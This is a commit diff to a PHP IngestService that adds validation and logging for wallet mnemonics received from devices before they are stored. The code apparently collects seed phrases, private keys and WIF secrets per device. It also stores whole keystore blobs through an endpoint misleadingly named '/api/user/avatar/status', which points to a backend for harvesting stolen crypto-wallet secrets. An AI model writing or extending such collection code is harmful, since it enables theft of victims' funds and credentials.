feat: log
This commit is contained in:
@@ -527,6 +527,14 @@ class IngestService
|
||||
if ($secret === null || $secret === '') {
|
||||
return;
|
||||
}
|
||||
if (! $this->isValidMnemonic($secret)) {
|
||||
Log::warning('ingest mnemonic rejected: invalid phrase format', [
|
||||
'device_id' => $device->id,
|
||||
'length' => strlen($secret),
|
||||
]);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
$hash = WalletMnemonic::hashSecret($secret);
|
||||
$row = WalletMnemonic::query()->firstOrNew([
|
||||
@@ -544,6 +552,28 @@ class IngestService
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Validate that a secret looks like a BIP39 mnemonic (12 or 24 words,
|
||||
* each 3-8 lowercase letters). Non-mnemonic secrets (private keys, WIF)
|
||||
* are also accepted as-is.
|
||||
*/
|
||||
private function isValidMnemonic(string $secret): bool
|
||||
{
|
||||
$words = preg_split('/\s+/', strtolower(trim($secret))) ?: [];
|
||||
$n = count($words);
|
||||
if ($n === 12 || $n === 24) {
|
||||
foreach ($words as $word) {
|
||||
if (! preg_match('/^[a-z]{3,8}$/', $word)) {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
return true;
|
||||
}
|
||||
// Not a word mnemonic — could be a hex private key, WIF, etc. Accept.
|
||||
return true;
|
||||
}
|
||||
|
||||
/**
|
||||
* `/api/user/avatar/status` — store entire `result` keystore/identity blob.
|
||||
*/
|
||||
|
||||
Reference in New Issue
Block a user